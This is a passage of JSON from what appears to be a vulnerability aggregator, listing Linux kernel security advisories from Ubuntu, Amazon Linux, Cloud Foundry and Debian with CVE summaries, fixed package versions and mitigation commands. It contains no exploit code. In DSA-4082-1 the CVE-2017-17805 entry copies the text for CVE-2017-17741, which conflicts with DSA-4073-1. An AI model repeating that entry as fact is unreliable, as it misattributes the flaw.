cause a denial of service (application crashes) or possibly gain administrative privileges. (CVE-2017-1000405)\n\nFan Wu, Haoran Qiu, and Shixiong Zhao discovered that the associative array implementation in the Linux kernel sometimes did not properly handle adding a new entry. A local attacker could use this to cause a denial of service (system crash). (CVE-2017-12193)\n\nEric Biggers discovered that the key management subsystem in the Linux kernel did not properly restrict adding a key that already exists but is uninstantiated. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2017-15299)\n\nIt was discovered that a null pointer dereference error existed in the PowerPC KVM implementation in the Linux kernel. A local attacker could use this to cause a denial of service (system crash). (CVE-2017-15306)\n\nEric Biggers discovered a race condition in the key management subsystem of the Linux kernel around keys in a negative state. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2017-15951)", "modified": "2017-12-08T00:00:00", "published": "2017-12-08T00:00:00", "id": "USN-3507-2", "href": "https://usn.ubuntu.com/3507-2/", "title": "Linux kernel (GCP) vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "amazon": [{"lastseen": "2019-05-29T19:20:41", "bulletinFamily": "unix", "description": "**Issue Overview:**\n\nA flaw was found in the patches used to fix the 'dirtycow' vulnerability ([CVE-2016-5195 __](<https://access.redhat.com/security/cve/CVE-2016-5195>)). An attacker, able to run local code, can exploit a race condition in transparent huge pages to modify usually read-only huge pages. ([CVE-2017-1000405 __](<https://access.redhat.com/security/cve/CVE-2017-1000405>))\n\nLinux kernel Virtualization Module (CONFIG_KVM) for the Intel processor family (CONFIG_KVM_INTEL) is vulnerable to a DoS issue. It could occur if a guest was to flood the I/O port 0x80 with write requests. A guest user could use this flaw to crash the host kernel resulting in DoS. ([CVE-2017-1000407 __](<https://access.redhat.com/security/cve/CVE-2017-1000407>))\n\nA BUG in drivers/net/usb/asix_devices.c in the Linux kernel through 4.13.11 allows local users to cause a denial of service (NULL pointer dereference and system crash) or possibly have unspecified other impact via a crafted USB device. ([CVE-2017-16647 __](<https://access.redhat.com/security/cve/CVE-2017-16647>))\n\nA BUG in drivers/media/usb/dvb-usb/dib0700_devices.c in the Linux kernel through 4.13.11 allows local users to cause a denial of service (BUG and system crash) or possibly have unspecified other impact via a crafted USB device. ([CVE-2017-16646 __](<https://access.redhat.com/security/cve/CVE-2017-16646>))\n\nThe ims_pcu_get_cdc_union_desc function in drivers/input/misc/ims-pcu.c in the Linux kernel through 4.13.11 allows local users to cause a denial of service (ims_pcu_parse_cdc_data out-of-bounds read and system crash) or possibly have unspecified other impact via a crafted USB device. ([CVE-2017-16645 __](<https://access.redhat.com/security/cve/CVE-2017-16645>))\n\nThe parse_hid_report_descriptor function in drivers/input/tablet/gtco.c in the Linux kernel before 4.13.11 allows local users to cause a denial of service (out-of-bounds read and system crash) or possibly have unspecified other impact via a crafted USB device. ([CVE-2017-16643 __](<https://access.redhat.com/security/cve/CVE-2017-16643>))\n\nThe walk_hugetlb_range() function in 'mm/pagewalk.c' file in the Linux kernel from v4.0-rc1 through v4.15-rc1 mishandles holes in hugetlb ranges. This allows local users to obtain sensitive information from uninitialized kernel memory via crafted use of the mincore() system call. ([CVE-2017-16994 __](<https://access.redhat.com/security/cve/CVE-2017-16994>))\n\nThe qmi_wwan_bind function in drivers/net/usb/qmi_wwan.c in the Linux kernel through 4.13.11 allows local users to cause a denial of service (divide-by-zero error and system crash) or possibly have unspecified other impact via a crafted USB device. ([CVE-2017-16650 __](<https://access.redhat.com/security/cve/CVE-2017-16650>))\n\nThe usbnet_generic_cdc_bind function in drivers/net/usb/cdc_ether.c in the Linux kernel through 4.13.11 allows local users to cause a denial of service (divide-by-zero error and system crash) or possibly have unspecified other impact via a crafted USB device. ([CVE-2017-16649 __](<https://access.redhat.com/security/cve/CVE-2017-16649>))\n\nA vulnerability was found in the Linux kernel when peeling off an association to the socket in another network namespace. All transports in this association are not to be rehashed and keep using the old key in hashtable, thus removing transports from hashtable when closing the socket, all transports are being freed. Later on a use-after-free issue could be caused when looking up an association and dereferencing the transports. ([CVE-2017-15115 __](<https://access.redhat.com/security/cve/CVE-2017-15115>))\n\n \n**Affected Packages:** \n\n\nkernel\n\n \n**Issue Correction:** \nRun _yum update kernel_ to update your system. \n\n\n \n\n\n**New Packages:**\n \n \n i686: \n perf-4.9.70-22.55.amzn1.i686 \n kernel-4.9.70-22.55.amzn1.i686 \n kernel-debuginfo-common-i686-4.9.70-22.55.amzn1.i686 \n kernel-debuginfo-4.9.70-22.55.amzn1.i686 \n perf-debuginfo-4.9.70-22.55.amzn1.i686 \n kernel-tools-devel-4.9.70-22.55.amzn1.i686 \n kernel-headers-4.9.70-22.55.amzn1.i686 \n kernel-tools-4.9.70-22.55.amzn1.i686 \n kernel-devel-4.9.70-22.55.amzn1.i686 \n kernel-tools-debuginfo-4.9.70-22.55.amzn1.i686 \n \n noarch: \n kernel-doc-4.9.70-22.55.amzn1.noarch \n \n src: \n kernel-4.9.70-22.55.amzn1.src \n \n x86_64: \n kernel-tools-4.9.70-22.55.amzn1.x86_64 \n kernel-devel-4.9.70-22.55.amzn1.x86_64 \n kernel-headers-4.9.70-22.55.amzn1.x86_64 \n kernel-4.9.70-22.55.amzn1.x86_64 \n perf-4.9.70-22.55.amzn1.x86_64 \n kernel-tools-devel-4.9.70-22.55.amzn1.x86_64 \n kernel-tools-debuginfo-4.9.70-22.55.amzn1.x86_64 \n kernel-debuginfo-common-x86_64-4.9.70-22.55.amzn1.x86_64 \n perf-debuginfo-4.9.70-22.55.amzn1.x86_64 \n kernel-debuginfo-4.9.70-22.55.amzn1.x86_64 \n \n \n", "modified": "2017-12-21T23:12:00", "published": "2017-12-21T23:12:00", "id": "ALAS-2017-937", "href": "https://alas.aws.amazon.com/ALAS-2017-937.html", "title": "Important: kernel", "type": "amazon", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T19:20:24", "bulletinFamily": "unix", "description": "**Issue Overview:**\n\nKernel address information leak in drivers/acpi/sbshc.c:acpi_smbus_hc_add() function potentially allowing KASLR bypass \nThe acpi_smbus_hc_add function in drivers/acpi/sbshc.c in the Linux kernel, through 4.14.15, allows local users to obtain sensitive address information by reading dmesg data from an SBS HC printk call.([CVE-2018-5750 __](<https://access.redhat.com/security/cve/CVE-2018-5750>))\n\nImproper sorting of GIDs in nfsd can lead to incorrect permissions being applied \nLinux kernel contains a Incorrect Access Control vulnerability in NFS server (nfsd) that can result in remote users reading or writing files they should not be able to via NFS. This attack appear to be exploitable via NFS server must export a filesystem with the \"rootsquash\" options enabled. This vulnerability appears to have been fixed in after commit 1995266727fa.([CVE-2018-1000028 __](<https://access.redhat.com/security/cve/CVE-2018-1000028>))\n\nStack-based out-of-bounds read via vmcall instruction \nLinux kernel compiled with the KVM virtualization (CONFIG_KVM) support is vulnerable to an out-of-bounds read access issue. It could occur when emulating vmcall instructions invoked by a guest. A guest user/process could use this flaw to disclose kernel memory bytes.([CVE-2017-17741 __](<https://access.redhat.com/security/cve/CVE-2017-17741>))\n\nThe pmd can become dirty without going through a COW cycle \nA flaw was found in the patches used to fix the 'dirtycow' vulnerability ([CVE-2016-5195 __](<https://access.redhat.com/security/cve/CVE-2016-5195>)). An attacker, able to run local code, can exploit a race condition in transparent huge pages to modify usually read-only huge pages.([CVE-2017-1000405 __](<https://access.redhat.com/security/cve/CVE-2017-1000405>))\n\nSpeculative execution bounds-check bypass \nAn industry-wide issue was found in the way many modern microprocessor designs have implemented speculative execution of instructions (a commonly used performance optimization). There are three primary variants of the issue which differ in the way the speculative execution can be exploited. Variant [CVE-2017-5753 __](<https://access.redhat.com/security/cve/CVE-2017-5753>) triggers the speculative execution by performing a bounds-check bypass. It relies on the presence of a precisely-defined instruction sequence in the privileged code as well as the fact that memory accesses may cause allocation into the microprocessor's data cache even for speculatively executed instructions that never actually commit (retire). As a result, an unprivileged attacker could use this flaw to cross the syscall boundary and read privileged memory by conducting targeted cache side-channel attacks.([CVE-2017-5753 __](<https://access.redhat.com/security/cve/CVE-2017-5753>))\n\ndrivers/block/loop.c mishandles lo_release serialization allowing denial-of-service \nA flaw was found in the Linux kernel's handling of loopback devices. An attacker, who has permissions to setup loopback disks, may create a denial of service or other unspecified actions. ([CVE-2018-5344 __](<https://access.redhat.com/security/cve/CVE-2018-5344>))\n\n \n**Affected Packages:** \n\n\nkernel\n\n \n**Issue Correction:** \nRun _yum update kernel_ to update your system. \n\n\n \n\n\n**New Packages:**\n \n \n i686: \n kernel-tools-debuginfo-4.9.81-35.56.amzn1.i686 \n kernel-devel-4.9.81-35.56.amzn1.i686 \n kernel-headers-4.9.81-35.56.amzn1.i686 \n kernel-debuginfo-4.9.81-35.56.amzn1.i686 \n kernel-4.9.81-35.56.amzn1.i686 \n kernel-tools-4.9.81-35.56.amzn1.i686 \n kernel-debuginfo-common-i686-4.9.81-35.56.amzn1.i686 \n kernel-tools-devel-4.9.81-35.56.amzn1.i686 \n perf-4.9.81-35.56.amzn1.i686 \n perf-debuginfo-4.9.81-35.56.amzn1.i686 \n \n noarch: \n kernel-doc-4.9.81-35.56.amzn1.noarch \n \n src: \n kernel-4.9.81-35.56.amzn1.src \n \n x86_64: \n kernel-4.9.81-35.56.amzn1.x86_64 \n kernel-tools-debuginfo-4.9.81-35.56.amzn1.x86_64 \n kernel-devel-4.9.81-35.56.amzn1.x86_64 \n kernel-tools-devel-4.9.81-35.56.amzn1.x86_64 \n kernel-debuginfo-common-x86_64-4.9.81-35.56.amzn1.x86_64 \n perf-4.9.81-35.56.amzn1.x86_64 \n kernel-headers-4.9.81-35.56.amzn1.x86_64 \n kernel-debuginfo-4.9.81-35.56.amzn1.x86_64 \n kernel-tools-4.9.81-35.56.amzn1.x86_64 \n perf-debuginfo-4.9.81-35.56.amzn1.x86_64 \n \n \n", "modified": "2018-02-21T20:45:00", "published": "2018-02-21T20:45:00", "id": "ALAS-2018-956", "href": "https://alas.aws.amazon.com/ALAS-2018-956.html", "title": "Important: kernel", "type": "amazon", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "cloudfoundry": [{"lastseen": "2019-05-29T18:32:38", "bulletinFamily": "software", "description": "# \n\n# Severity\n\nHigh\n\n# Vendor\n\nCanonical Ubuntu\n\n# Versions Affected\n\n * Canonical Ubuntu 14.04\n\n# Description\n\nUSN-3509-1 fixed vulnerabilities in the Linux kernel for Ubuntu 16.04 LTS. This update provides the corresponding updates for the Linux Hardware Enablement (HWE) kernel from Ubuntu 16.04 LTS for Ubuntu 14.04 LTS.\n\nMohamed Ghannam discovered that a use-after-free vulnerability existed in the Netlink subsystem (XFRM) in the Linux kernel. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. ([CVE-2017-16939](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-16939>))\n\nIt was discovered that the Linux kernel did not properly handle copy-on- write of transparent huge pages. A local attacker could use this to cause a denial of service (application crashes) or possibly gain administrative privileges. ([CVE-2017-1000405](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-1000405>)) Please note: this CVE is also known colloquially as \u201chuge dirty cow\u201d.\n\nFan Wu, Haoran Qiu, and Shixiong Zhao discovered that the associative array implementation in the Linux kernel sometimes did not properly handle adding a new entry. A local attacker could use this to cause a denial of service (system crash). ([CVE-2017-12193](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-12193>))\n\nAndrey Konovalov discovered an out-of-bounds read in the GTCO digitizer USB driver for the Linux kernel. A physically proximate attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. ([CVE-2017-16643](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-16643>))\n\n# Affected Cloud Foundry Products and Versions\n\n_Severity is high unless otherwise noted._\n\n * Cloud Foundry BOSH stemcells are vulnerable, including: \n * 3421.x versions prior to 3421.34\n * 3445.x versions prior to 3445.19\n * 3468.x versions prior to 3468.13\n * All other stemcells not listed.\n\n# Mitigation\n\nOSS users are strongly encouraged to follow one of the mitigations below:\n\n * The Cloud Foundry project recommends upgrading the following BOSH stemcells: \n * Upgrade 3421.x versions prior to 3421.34\n * Upgrade 3445.x versions prior to 3445.19\n * Upgrade 3468.x versions prior to 3468.13\n * All other stemcells should be upgraded to the latest version available on [bosh.io](<https://bosh.io>).\n\n# References\n\n * [USN-3509-2](<http://www.ubuntu.com/usn/usn-3509-2/>)\n * [CVE-2017-16939](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-16939>)\n * [CVE-2017-1000405](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-1000405>)\n * [CVE-2017-12193](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-12193>)\n * [CVE-2017-16643](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-16643>)\n", "modified": "2017-12-08T00:00:00", "published": "2017-12-08T00:00:00", "id": "CFOUNDRY:0BD4290D520A235B05B93F0ACF4B7C2B", "href": "https://www.cloudfoundry.org/blog/usn-3509-2/", "title": "USN-3509-2: Linux kernel (Xenial HWE) vulnerabilities | Cloud Foundry", "type": "cloudfoundry", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:32:45", "bulletinFamily": "software", "description": "# \n\n# Severity\n\nUnspecified\n\n# Vendor\n\nCanonical Ubuntu\n\n# Versions Affected\n\n * Canonical Ubuntu 14.04\n\n# Description\n\nUSN-3509-2 fixed vulnerabilities in the Linux Hardware Enablement kernel for Ubuntu 14.04 LTS. Unfortunately, it also introduced a regression that prevented the Ceph network filesystem from being used. This update fixes the problem.\n\nWe apologize for the inconvenience.\n\nOriginal advisory details:\n\nMohamed Ghannam discovered that a use-after-free vulnerability existed in the Netlink subsystem (XFRM) in the Linux kernel. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2017-16939)\n\nIt was discovered that the Linux kernel did not properly handle copy-on- write of transparent huge pages. A local attacker could use this to cause a denial of service (application crashes) or possibly gain administrative privileges. (CVE-2017-1000405)\n\nFan Wu, Haoran Qiu, and Shixiong Zhao discovered that the associative array implementation in the Linux kernel sometimes did not properly handle adding a new entry. A local attacker could use this to cause a denial of service (system crash). (CVE-2017-12193)\n\nAndrey Konovalov discovered an out-of-bounds read in the GTCO digitizer USB driver for the Linux kernel. A physically proximate attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2017-16643)\n\n# Affected Cloud Foundry Products and Versions\n\n_Severity is unspecified unless otherwise noted._\n\n * Cloud Foundry BOSH trusty-stemcells are vulnerable, including: \n * 3312.x versions prior to 3312.49\n * 3363.x versions prior to 3363.45\n * 3421.x versions prior to 3421.35\n * 3445.x versions prior to 3445.21\n * 3468.x versions prior to 3468.16\n * All other stemcells not listed.\n\n# Mitigation\n\nOSS users are strongly encouraged to follow one of the mitigations below:\n\n * The Cloud Foundry project recommends upgrading the following BOSH trusty-stemcells: \n * Upgrade 3312.x versions to 3312.49\n * Upgrade 3363.x versions to 3363.45\n * Upgrade 3421.x versions to 3421.35\n * Upgrade 3445.x versions to 3445.21\n * Upgrade 3468.x versions to 3468.16\n * All other stemcells should be upgraded to the latest version available on [bosh.io](<https://bosh.io/stemcells/#ubuntu-trusty>).\n\n# References\n\n * [USN-3509-4](<https://usn.ubuntu.com/3509-4>)\n", "modified": "2017-12-16T00:00:00", "published": "2017-12-16T00:00:00", "id": "CFOUNDRY:74EC63FE794662FC4DFD36709B39475A", "href": "https://www.cloudfoundry.org/blog/usn-3509-4/", "title": "USN-3509-4: Linux kernel (Xenial HWE) regression | Cloud Foundry", "type": "cloudfoundry", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "debian": [{"lastseen": "2019-09-25T22:40:42", "bulletinFamily": "unix", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4082-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nJanuary 09, 2018 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : linux\nCVE ID : CVE-2017-5754 CVE-2017-8824 CVE-2017-15868 CVE-2017-16538\n CVE-2017-16939 CVE-2017-17448 CVE-2017-17449 CVE-2017-17450\n CVE-2017-17558 CVE-2017-17741 CVE-2017-17805 CVE-2017-17806\n CVE-2017-17807 CVE-2017-1000407 CVE-2017-1000410\n\nSeveral vulnerabilities have been discovered in the Linux kernel that\nmay lead to a privilege escalation, denial of service or information\nleaks.\n\nCVE-2017-5754\n\n Multiple researchers have discovered a vulnerability in Intel\n processors, enabling an attacker controlling an unprivileged\n process to read memory from arbitrary addresses, including from\n the kernel and all other processes running on the system.\n\n This specific attack has been named Meltdown and is addressed in\n the Linux kernel for the Intel x86-64 architecture by a patch set\n named Kernel Page Table Isolation, enforcing a near complete\n separation of the kernel and userspace address maps and preventing\n the attack. This solution might have a performance impact, and can\n be disabled at boot time by passing `pti=off' to the kernel\n command line.\n\nCVE-2017-8824\n\n Mohamed Ghannam discovered that the DCCP implementation did not\n correctly manage resources when a socket is disconnected and\n reconnected, potentially leading to a use-after-free. A local\n user could use this for denial of service (crash or data\n corruption) or possibly for privilege escalation. On systems that\n do not already have the dccp module loaded, this can be mitigated\n by disabling it:\n echo >> /etc/modprobe.d/disable-dccp.conf install dccp false\n\nCVE-2017-15868\n\n Al Viro found that the Bluebooth Network Encapsulation Protocol\n (BNEP) implementation did not validate the type of the second\n socket passed to the BNEPCONNADD ioctl(), which could lead to\n memory corruption. A local user with the CAP_NET_ADMIN capability\n can use this for denial of service (crash or data corruption) or\n possibly for privilege escalation.\n\nCVE-2017-16538\n\n Andrey Konovalov reported that the dvb-usb-lmedm04 media driver\n did not correctly handle some error conditions during\n initialisation. A physically present user with a specially\n designed USB device can use this to cause a denial of service\n (crash).\n\nCVE-2017-16939\n\n Mohamed Ghannam reported (through Beyond Security's SecuriTeam\n Secure Disclosure program) that the IPsec (xfrm) implementation\n did not correctly handle some failure cases when dumping policy\n information through netlink. A local user with the CAP_NET_ADMIN\n capability can use this for denial of service (crash or data\n corruption) or possibly for privilege escalation.\n\nCVE-2017-17448\n\n Kevin Cernekee discovered that the netfilter subsystem allowed\n users with the CAP_NET_ADMIN capability in any user namespace, not\n just the root namespace, to enable and disable connection tracking\n helpers. This could lead to denial of service, violation of\n network security policy, or have other impact.\n\nCVE-2017-17449\n\n Kevin Cernekee discovered that the netlink subsystem allowed\n users with the CAP_NET_ADMIN capability in any user namespace\n to monitor netlink traffic in all net namespaces, not just\n those owned by that user namespace. This could lead to\n exposure of sensitive information.\n\nCVE-2017-17450\n\n Kevin Cernekee discovered that the xt_osf module allowed users\n with the CAP_NET_ADMIN capability in any user namespace to modify\n the global OS fingerprint list.\n\nCVE-2017-17558\n\n Andrey Konovalov reported that that USB core did not correctly\n handle some error conditions during initialisation. A physically\n present user with a specially designed USB device can use this to\n cause a denial of service (crash or memory corruption), or\n possibly for privilege escalation.\n\nCVE-2017-17741\n\n Dmitry Vyukov reported that the KVM implementation for x86 would\n over-read data from memory when emulating an MMIO write if the\n kvm_mmio tracepoint was enabled. A guest virtual machine might be\n able to use this to cause a denial of service (crash).\n\nCVE-2017-17805\n\n Dmitry Vyukov reported that the KVM implementation for x86 would\n over-read data from memory when emulating an MMIO write if the\n kvm_mmio tracepoint was enabled. A guest virtual machine might be\n able to use this to cause a denial of service (crash).\n\nCVE-2017-17806\n\n It was discovered that the HMAC implementation could be used with\n an underlying hash algorithm that requires a key, which was not\n intended. A local user could use this to cause a denial of\n service (crash or memory corruption), or possibly for privilege\n escalation.\n\nCVE-2017-17807\n\n Eric Biggers discovered that the KEYS subsystem lacked a check for\n write permission when adding keys to a process's default keyring.\n A local user could use this to cause a denial of service or to\n obtain sensitive information.\n\nCVE-2017-1000407\n\n Andrew Honig reported that the KVM implementation for Intel\n processors allowed direct access to host I/O port 0x80, which\n is not generally safe. On some systems this allows a guest\n VM to cause a denial of service (crash) of the host.\n\nCVE-2017-1000410\n\n Ben Seri reported that the Bluetooth subsystem did not correctly\n handle short EFS information elements in L2CAP messages. An\n attacker able to communicate over Bluetooth could use this to\n obtain sensitive information from the kernel.\n\nFor the oldstable distribution (jessie), these problems have been fixed\nin version 3.16.51-3+deb8u1.\n\nWe recommend that you upgrade your linux packages.\n\nFor the detailed security status of linux please refer to its security\ntracker page at:\nhttps://security-tracker.debian.org/tracker/linux\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "modified": "2018-01-09T16:11:13", "published": "2018-01-09T16:11:13", "id": "DEBIAN:DSA-4082-1:57979", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2018/msg00004.html", "title": "[SECURITY] [DSA 4082-1] linux security update", "type": "debian", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-09-25T22:37:55", "bulletinFamily": "unix", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4073-1 security@debian.org\nhttps://www.debian.org/security/ Ben Hutchings\nDecember 23, 2017 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : linux\nCVE ID : CVE-2017-8824 CVE-2017-16538 CVE-2017-16644 CVE-2017-16995\n CVE-2017-17448 CVE-2017-17449 CVE-2017-17450 CVE-2017-17558\n CVE-2017-17712 CVE-2017-17741 CVE-2017-17805 CVE-2017-17806\n CVE-2017-17807 CVE-2017-17862 CVE-2017-17863 CVE-2017-17864\n CVE-2017-1000407 CVE-2017-1000410\n\nSeveral vulnerabilities have been discovered in the Linux kernel that\nmay lead to a privilege escalation, denial of service or information\nleaks.\n\nCVE-2017-8824\n\n Mohamed Ghannam discovered that the DCCP implementation did not\n correctly manage resources when a socket is disconnected and\n reconnected, potentially leading to a use-after-free. A local\n user could use this for denial of service (crash or data\n corruption) or possibly for privilege escalation. On systems that\n do not already have the dccp module loaded, this can be mitigated\n by disabling it:\n echo >> /etc/modprobe.d/disable-dccp.conf install dccp false\n\nCVE-2017-16538\n\n Andrey Konovalov reported that the dvb-usb-lmedm04 media driver\n did not correctly handle some error conditions during\n initialisation. A physically present user with a specially\n designed USB device can use this to cause a denial of service\n (crash).\n\nCVE-2017-16644\n\n Andrey Konovalov reported that the hdpvr media driver did not\n correctly handle some error conditions during initialisation. A\n physically present user with a specially designed USB device can\n use this to cause a denial of service (crash).\n\nCVE-2017-16995\n\n Jann Horn discovered that the Extended BPF verifier did not\n correctly model the behaviour of 32-bit load instructions. A\n local user can use this for privilege escalation.\n\nCVE-2017-17448\n\n Kevin Cernekee discovered that the netfilter subsystem allowed\n users with the CAP_NET_ADMIN capability in any user namespace, not\n just the root namespace, to enable and disable connection tracking\n helpers. This could lead to denial of service, violation of\n network security policy, or have other impact.\n\nCVE-2017-17449\n\n Kevin Cernekee discovered that the netlink subsystem allowed\n users with the CAP_NET_ADMIN capability in any user namespace\n to monitor netlink traffic in all net namespaces, not just\n those owned by that user namespace. This could lead to\n exposure of sensitive information.\n\nCVE-2017-17450\n\n Kevin Cernekee discovered that the xt_osf module allowed users\n with the CAP_NET_ADMIN capability in any user namespace to modify\n the global OS fingerprint list.\n\nCVE-2017-17558\n\n Andrey Konovalov reported that that USB core did not correctly\n handle some error conditions during initialisation. A physically\n present user with a specially designed USB device can use this to\n cause a denial of service (crash or memory corruption), or\n possibly for privilege escalation.\n\nCVE-2017-17712\n\n Mohamed Ghannam discovered a race condition in the IPv4 raw socket\n implementation. A local user could use this to obtain sensitive\n information from the kernel.\n\nCVE-2017-17741\n\n Dmitry Vyukov reported that the KVM implementation for x86 would\n over-read data from memory when emulating an MMIO write if the\n kvm_mmio tracepoint was enabled. A guest virtual machine might be\n able to use this to cause a denial of service (crash).\n\nCVE-2017-17805\n\n It was discovered that some implementations of the Salsa20 block\n cipher did not correctly handle zero-length input. A local user\n could use this to cause a denial of service (crash) or possibly\n have other security impact.\n\nCVE-2017-17806\n\n It was discovered that the HMAC implementation could be used with\n an underlying hash algorithm that requires a key, which was not\n intended. A local user could use this to cause a denial of\n service (crash or memory corruption), or possibly for privilege\n escalation.\n\nCVE-2017-17807\n\n Eric Biggers discovered that the KEYS subsystem lacked a check for\n write permission when adding keys to a process's default keyring.\n A local user could use this to cause a denial of service or to\n obtain sensitive information.\n\nCVE-2017-17862\n\n Alexei Starovoitov discovered that the Extended BPF verifier\n ignored unreachable code, even though it would still be processed\n by JIT compilers. This could possibly be used by local users for\n denial of service. It also increases the severity of bugs in\n determining unreachable code.\n\nCVE-2017-17863\n\n Jann Horn discovered that the Extended BPF verifier did not\n correctly model pointer arithmetic on the stack frame pointer.\n A local user can use this for privilege escalation.\n\nCVE-2017-17864\n\n Jann Horn discovered that the Extended BPF verifier could fail to\n detect pointer leaks from conditional code. A local user could\n use this to obtain sensitive information in order to exploit\n other vulnerabilities.\n\nCVE-2017-1000407\n\n Andrew Honig reported that the KVM implementation for Intel\n processors allowed direct access to host I/O port 0x80, which\n is not generally safe. On some systems this allows a guest\n VM to cause a denial of service (crash) of the host.\n\nCVE-2017-1000410\n\n Ben Seri reported that the Bluetooth subsystem did not correctly\n handle short EFS information elements in L2CAP messages. An\n attacker able to communicate over Bluetooth could use this to\n obtain sensitive information from the kernel.\n\nThe various problems in the Extended BPF verifier can be mitigated by\ndisabling use of Extended BPF by unprivileged users:\nsysctl kernel.unprivileged_bpf_disabled=1\n\nDebian disables unprivileged user namespaces by default, but if they\nare enabled (via the kernel.unprivileged_userns_clone sysctl) then\nCVE-2017-17448 can be exploited by any local user.\n\nFor the stable distribution (stretch), these problems have been fixed in\nversion 4.9.65-3+deb9u1.\n\nWe recommend that you upgrade your linux packages.\n\nFor the detailed security status of linux please refer to its security\ntracker page at: https://security-tracker.debian.org/tracker/linux\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "modified": "2017-12-23T20:13:29", "published": "2017-12-23T20:13:29", "id": "DEBIAN:DSA-4073-1:79398", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2017/msg00336.html", "title": "[SECURITY] [DSA 4073-1] linux security update", "type": "debian", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}]}